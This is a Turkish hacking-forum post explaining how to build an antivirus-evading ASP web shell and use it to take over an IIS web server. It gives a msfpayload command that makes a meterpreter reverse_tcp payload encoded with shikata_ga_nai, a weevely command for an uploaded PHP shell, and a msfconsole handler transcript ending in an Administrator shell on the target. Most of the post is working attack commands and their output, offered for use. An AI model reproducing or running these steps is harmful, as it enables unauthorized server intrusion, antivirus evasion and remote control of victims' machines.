İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Antivirüsler Tarafınfan Yakalanamayan ASP Shell Oluşturmak

26-01-2017 00:04
#1
Anka1050 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
İstanbul
Mesajlar:
118
Teşekkür (Etti):
99
Teşekkür (Aldı):
33
Konular:
19
Ticaret:
(0) %
Merhaba herkese,

Şimdi hedef web Sunucuda (IIS-windows) eğer dosya yükleme hakkı elde etmişsek , antivirüsler tarafından yakalanamayan asp shell dosyası kullanarak hedef web sunucuyu ele geçirebilme şansımız ortaya çıkabilir.

msfpayload windows/meterpreter/reverse_tcp LHOST=kali-sunucu-ipsi LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp

msfpayload komutu ile antivirüsler tarafından yakalanamayan asp shell oluşturup, dosya yükleme hakkımız olan web sunucuna yükleyebiliriz.


weevely http://192.168.10.100/sh.php abc123

Oluşturduğumuz php shell dosyasını web sunucusuna attıktan sonra hedef web sunucusundan shell elde etmek için tekrar weevely komutunu kullanırız.


root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.23 ((Kali sunucsunun İp'si)
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
meterpreter > getuid
Server username: alipc\Administrator
meterpreter > sysinfo
Computer : ALIPC
OS : Windows 8 (Build 9200).
Architecture : x64 (Current Process is WOW64)
System Language : tr_TR
Meterpreter : x86/win32
meterpreter >


asp shell dosyası web sunucusuna yükledikten sonra dosya tarayıcı ile çalıştırıyoruz.

(http://hedef-web-sunuc-ip/sh.asp)

Dosya çalıştırıldıktan sonra Meterpreter oturumu elde edilmiş olur.
Kullanıcı İmzası
\\ Yaşasın Irkımın Turan Ülküsü //


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı